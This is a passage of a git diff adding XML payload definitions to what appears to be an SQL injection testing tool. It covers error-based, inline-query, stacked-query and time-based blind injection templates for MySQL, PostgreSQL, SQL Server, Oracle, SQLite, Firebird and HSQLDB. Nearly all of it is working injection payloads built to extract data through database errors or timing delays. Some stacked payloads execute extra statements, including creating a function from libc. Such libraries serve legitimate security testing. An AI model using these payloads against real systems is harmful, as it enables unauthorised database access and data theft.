+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird error-based - Parameter replace</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+    <!-- End of error-based tests - Parameter replace -->
+
+
+    <!-- Error-based tests - GROUP BY and ORDER BY clauses -->
+    <test>
+        <title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
+        <request>
+            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
+        <request>
+            <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>0</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
+        <request>
+            <payload>,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>3</clause>
+        <where>1</where>
+        <vector>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
+        <request>
+            <payload>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle error-based - GROUP BY and ORDER BY clauses</title>
+        <stype>2</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
+        <request>
+            <payload>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+    <!--
+         TODO: if possible, add payload for SQLite, Microsoft Access
+         and SAP MaxDB - no known techniques at this time
+    -->
+    <!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
+</root>
diff --git a/xml/payloads/03_inline_query.xml b/xml/payloads/03_inline_query.xml
new file mode 100644
index 000000000..595ff3dab
--- /dev/null
+++ b/xml/payloads/03_inline_query.xml
@@ -0,0 +1,120 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Inline queries tests -->
+    <test>
+        <title>MySQL inline queries</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL inline queries</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase inline queries</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle inline queries</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite inline queries</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
+        <request>
+            <payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+        </details>
+    </test>
+    <test>
+        <title>Firebird inline queries</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
+        <request>
+            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+    <!-- End of inline queries tests -->
+</root>
diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml
new file mode 100644
index 000000000..8eb334738
--- /dev/null
+++ b/xml/payloads/04_stacked_queries.xml
@@ -0,0 +1,337 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Stacked queries tests -->
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 stacked queries</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>; SELECT SLEEP([SLEEPTIME])</payload>
+            <comment>-- </comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+            <comment>-- </comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 stacked queries</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&lt; 8.2</dbms_version>
+            <os>Linux</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+            <os>Windows</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
+        <request>
+            <payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+    
+    <test>
+        <title>HSQLDB &gt;= 1.7.2 stacked queries</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 1.7.2</dbms_version>
+        </details>
+    </test>
+    
+    <test>
+        <title>HSQLDB &gt;= 2.0 stacked queries</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>0</clause>
+        <where>1</where>
+        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
+        <request>
+            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>HSQLDB</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+    <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
+    <!-- End of stacked queries tests -->
+</root>
diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
new file mode 100644
index 000000000..1d3ba16df
--- /dev/null
+++ b/xml/payloads/05_time_blind.xml
@@ -0,0 +1,1574 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- AND time-based blind tests -->
+    <test>
+        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 AND time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>AND SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt; 5.0.11 AND time-based blind (comment)</title>
+        <stype>5</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>AND SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt; 5.0.11</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query)</title>
+        <stype>5</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query - comment)</title>
+        <stype>5</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 AND time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
